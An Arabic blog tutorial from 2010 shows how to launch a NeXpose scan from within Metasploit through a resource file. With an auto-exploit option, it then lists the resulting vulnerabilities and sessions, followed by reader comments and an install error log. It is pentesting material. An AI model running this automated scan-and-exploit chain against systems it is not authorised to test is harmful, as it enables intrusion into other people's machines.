كيفية إستعمال NeXpose من داخل Metasploit لتنفيذ هجوم
الكاتب: علي الشّمري | يوم: 12 مارس, 2010 | التعليقات: 8 | القراءات: - عدد المشاهدات 12٬953
نريد أن اقوم بعمل فحص على الشبكة من خلال NeXpose وفي حالة إكتشافه لثغرة قادر Metasploit على تنفيذها، أريده يقوم بإستغلالها … أذن لنبدأ معاً … أول شيء قم بإنشاء ملف في مجلد Metasploit مثلاً وسميه ما شئت (أنا سأستعمل الأسم NeXpose.rc):
vim NeXpose.rc
وضع فيه التالي:
db_create nexpose test.db load nexpose nexpose_connect nxadmin:password@localhost:3780 nexpose_scan -v -x -t pentest-audit 172.16.1.55
أغلق الملف وأحفظه … ولنوضح ما هي هذه السطور:
السطر الأول: قمنا بعملية إنشاء قاعدة بيانات لـ NeXpose …
السطر الثاني: قمنا بعملية تحميل NeXpose …
السطر الثالث: قمنا بعملية الإتصال على خادم NeXpose ووضعنا أسم المستخدم المراد إستعماله مع كلمة السر الخاصة به … في حالة كنت تستعمل NeXpose على خادم وتستعمل Metasploit من خادم آخر، قم بإسبتدال localhost بعنوان الـ IP الخاص بخادم NeXpose … أنا أستعمل خادم مركزي للامانة وأستعمل Metasploit من جهاز لاب توب قديم جداً ولا يتحمل أن يعمل عليه NeXpose ولهذا أستفيد من كونه عن بعد …
السطر الرابع: قمنا بتشغيل الفحص مع إختيار نوع الفحص والذي هنا هو pentest-audit وأيضاً أعطيناه الهدف المطلوب الفحص عليه، قم بإستبداله بما يناسبك … والخيار x هو لكي يقوم بتنفيذ أي إستغلال يكتشفه وقادر على إستغلاله بعد إنتهاء الفحص …
الآن لنقوم بالتنفيذ:
./msfconsole -r ./NeXpose.rc
ستظهر لك مثل هذا:
_ | | o _ _ _ _ _|_ __, , _ | | __ _|_ / |/ |/ | |/ | / | / \_|/ \_|/ / \_| | | | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/ /| \| =[ metasploit v3.3.4-dev [core:3.3 api:1.0] + -- --=[ 517 exploits - 245 auxiliary + -- --=[ 193 payloads - 23 encoders - 8 nops =[ svn r8531 updated today (2010.02.17) resource (./NeXpose.rc)> db_create nexpose_test.db [*] The specified database already exists, connecting [*] Successfully connected to the database [*] File: nexpose_test.db resource (./NeXpose.rc)> load nexpose ▄▄▄ ▄▄ ▄▄▄ ▄▄▄ ███ ██ ██ ▄██ ██▀█ ██ ▄████▄ ████ ██▄███▄ ▄████▄ ▄▄█████▄ ▄████▄ ██ ██ ██ ██▄▄▄▄██ ██ ██▀ ▀██ ██▀ ▀██ ██▄▄▄▄ ▀ ██▄▄▄▄██ ██ █▄██ ██▀▀▀▀▀▀ ████ ██ ██ ██ ██ ▀▀▀▀██▄ ██▀▀▀▀▀▀ ██ ███ ▀██▄▄▄▄█ ██ ██ ███▄▄██▀ ▀██▄▄██▀ █▄▄▄▄▄██ ▀██▄▄▄▄█ ▀▀ ▀▀▀ ▀▀▀▀▀ ▀▀▀ ▀▀▀ ██ ▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀ ▀▀▀▀▀ ██ [*] NeXpose integration has been activated [*] Successfully loaded plugin: nexpose resource (./NeXpose.rc)> nexpose_connect nxadmin:password@localhost:3780 [*] Connecting to NeXpose instance at localhost:3780 with username nxadmin... resource (./NeXpose.rc)> nexpose_scan -v -t pentest-audit 172.16.1.55 [*] Creating a new scan using template pentest-audit and 32 concurrent IPs against 172.16.1.55 [*] Scanning 1 addresses with template pentest-audit in sets of 32 [*] Scanning 172.16.1.55-172.16.1.55... [*] >> Created temporary site #1 [*] >> Created temporary report configuration #1 [*] >> Scan has been launched with ID #1 [*] >> Found 0 devices and 0 unresponsive [*] >> Found 1 devices and 0 unresponsive [*] >> Scan has been completed with ID #1 [*] >> Waiting on the report to generate... [*] >> Downloading the report data from NeXpose... [*] >> Deleting the temporary site and report... [*] Completed the scan of 1 addresses
الآن أنتهى الفحص لكي ترى النتائج، نفذ التالي:
msf > db_vulns
ستظهر لك قائمة بالنتائج حسب شبكتك والمشاكل التي عندك … وإذا كان قد تم إستغلال الجهاز من خلال ثغرة ما، فإنه يمكننا معرفة ذلك من خلال:
msf > sessions -l -v
أختر الـ Session الموجودة والباقي تعرفونه 🙂
علي (B!n@ry). دكتوراة في أنظمة الحاسوب. يعمل كأستاذ جامعي في قسم علم الحاسوب. مختص في التحقيقات الجنائية الالكترونية والإستجابة للحوادث الالكترونية (DFIR)، أمن الشبكات وتحليلها، وكذلك أمن أنظمة التشغيل المختلفة. حاصل على العديد من الشهادات التقنية، وسابقاً كان يعمل كمختص في جدر النّار، أنظمة كشف الاختراق، ادارة الثغرات والترقيعات، حماية الأنظمة، فحصوصات الاختراق، وتطبيق السياسات. مسؤول سابق عن متابعة وتطبيق (PCI DSS).
التعليقات:
اترك تعليقاً | عدد التعليقات: (8)
بارك الله في القائمين على هذا الصرح العظيم بإذنه
معلومات قيمة ..
جُزيت خيرًا
السلام عليكم
موضوع قوي قوي الصراحه
يعطييك الف عافيه هذه المواضيع
تقدم في مستوى الشخص
بوركت
في امان الله
شكراً أخي ابومحمد لكن يوجد أداة autopwn أظنها تقوم بنفس مبدأ عمل neXpose فهي تجرب الاستغلالات بشكل اتوماتيكي (الرجاء التوضيح)
وعليكم السلام … حياكم الله يا شباب وإن شاء الله تستفيدوا من الموقع وما فيه …
بخصوص كون autopwn تقوم بنفس الشيء، نعم أوافقك الرأي تقوم بذلك … لا اعرف إن كان هناك مزايا معينة … بحثت صراحة ولم أجد أجوبة … لعل الأفضل أن نقوم بتجربة ذلك 🙂
جزاكم الله كل خير يا اخي بيناري علي الموضوع الرائع .
how to install nexpose in bt4
http://www.youtube.com/watch?v=Bwr_dfGPBt8
اخوي يا ليت تقولي وش المشكله الي واجهتني وش حلها
Checking for available jvms
Validating jre in directory _jvm
./.DLLCACHE/nexserv: error while loading shared libraries: libstdc++.so.5: cannot open shared object file: No such file or directory
Using jre at _jvm
./.DLLCACHE/nexserv: error while loading shared libraries: libstdc++.so.5: cannot open shared object file: No such file or directory
Update merging failed: 127
Checking for available jvms
Validating jre in directory _jvm
./.DLLCACHE/nexserv: error while loading shared libraries: libstdc++.so.5: cannot open shared object file: No such file or directory
Using jre at _jvm
./.DLLCACHE/nexserv: error while loading shared libraries: libstdc++.so.5: cannot open shared object file: No such file or directory
NeXpose security console exited with code 127
كيفية استماله ميتاسبلويت هكر fb :/ nhebkom t3awnouni bech netaalim